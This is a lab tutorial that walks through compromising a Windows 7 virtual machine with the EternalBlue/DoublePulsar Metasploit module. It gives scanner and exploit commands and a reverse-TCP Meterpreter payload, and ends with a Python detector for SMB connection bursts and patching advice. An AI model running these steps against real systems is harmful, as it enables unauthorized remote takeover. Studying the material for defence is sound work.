WINDOWS 7 REMOTE EXPLOITATION WITH ETERNALBLUE & DOUBLEPULSAR EXPLOIT THROUGH METASPLOIT
EternalBlue is an exploit used by the WannaCry ransomware and is among the National Security Agency (NSA) exploits disclosed by the Shadow Brokers hacker group. It exploits a remote code execution vulnerability in Windows SMB; Microsoft has released the patch MS17-010 to address this vulnerability. EternalBlue exploits a target machine by sending crafted SMB packets over multiple TCP connections. It is used alongside DoublePulsar, a backdoor implant: used together, they create a backdoor, which the attackers then use to plant secondary malware on the victim's system. DoublePulsar gives the attacker persistence on the victim's machine.
This article describes the use of EternalBlue and DoublePulsar to hack into a Windows 7 machine. To achieve that we make use of Metasploit on a Kali Linux machine. Both machines run as virtual machines; to determine their IP addresses, we issue the following command on the Windows target:
ipconfig
And run the following command on the Kali Machine
ifconfig
The IP addresses of the Windows and Kali machines have been determined to be 192.168.43.104 and 192.168.43.45 respectively. For the attack to succeed, port 445 must also be open on the target host, so we can run a port scan against the target host to confirm that. To ensure that our Kali machine is up to date we run the following command:
apt-get update -y && apt-get upgrade -y
We now download the scanner and the exploit and add them to Metasploit, issuing the following commands on our attacking machine:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
We now move the file smb_ms17_010.rb into the folder /usr/share/metasploit-framework/modules/auxiliary/scanner/smb.
We then copy EternalBlue-Doublepulsar.rb and the deps folder to /usr/share/metasploit-framework/modules/exploits/windows/smb. Next we open EternalBlue-Doublepulsar.rb in any editor and change the ETERNALBLUE and DOUBLEPULSAR path entries to the SMB exploit directory /usr/share/metasploit-framework/modules/exploits/windows/smb. We also set the name of the process to inject into; here we use explorer.exe. Then we launch msfconsole and load the auxiliary scanner module smb_ms17_010:
use auxiliary/scanner/smb/smb_ms17_010
Then we run the following command to list the module's options:
show options
We now set RHOSTS to the victim's IP address:
set RHOSTS 192.168.43.104
After that, we run the scanner module with the run command:
run
The scanner checks whether the host is vulnerable and also displays details of the victim machine.
Next we switch to the EternalBlue and DoublePulsar exploit module and set its options with the following commands:
use exploit/windows/smb/eternalblue_doublepulsar
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.43.104
set LHOST 192.168.43.45
set targetarchitecture x86
With all of the above options set, we now run the exploit by issuing this command:
exploit
And lo and behold, we have a Meterpreter shell on the Windows 7 machine.
To confirm that the attack succeeded, we issue the command:
sysinfo
This will return information about the target machine.
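The attack above depends on port 445 being reachable and, as noted at the start, EternalBlue sends its crafted SMB packets over multiple TCP connections. As an added defensive example that is not part of the original post, the following Python script flags sources that open an unusual number of TCP connections to port 445 on a host within a short window; the log lines are constructed samples in a hypothetical key=value firewall format, and the threshold and window are assumptions to be tuned per network:

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample log lines in a hypothetical key=value firewall format:
# 10.0.0.5 bursts connections to 10.0.0.20:445, 10.0.0.7 is a normal client.
SAMPLE_LOGS = """\
2017-05-12T10:00:00Z src=10.0.0.7 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:00Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:01Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:01Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:02Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:02Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:01:03Z src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:30:00Z src=10.0.0.7 dst=10.0.0.20 dport=445 proto=tcp action=allow
2017-05-12T10:31:00Z src=10.0.0.5 dst=10.0.0.20 dport=80 proto=tcp action=allow
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)"
)

def parse_line(line):
    """Return (timestamp, src, dst, dport, proto), or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["dst"], int(m["dport"]), m["proto"].lower()

def find_smb_bursts(log_text, threshold=5, window_seconds=60):
    """Map (src, dst) -> peak number of TCP connections to port 445 seen inside one window."""
    conns = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] == 445 and rec[4] == "tcp":
            conns[(rec[1], rec[2])].append(rec[0])
    flagged = {}
    for pair, times in conns.items():
        times.sort()
        start = 0  # sliding window: only connections within window_seconds of each other count
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[pair] = max(flagged.get(pair, 0), end - start + 1)
    return flagged

if __name__ == "__main__":
    print(find_smb_bursts(SAMPLE_LOGS))
```

Legitimate file-sharing clients also use port 445, so the threshold needs a baseline from your own traffic before alerting on it. The definitive fixes remain applying MS17-010 and not exposing port 445 beyond the hosts that need it.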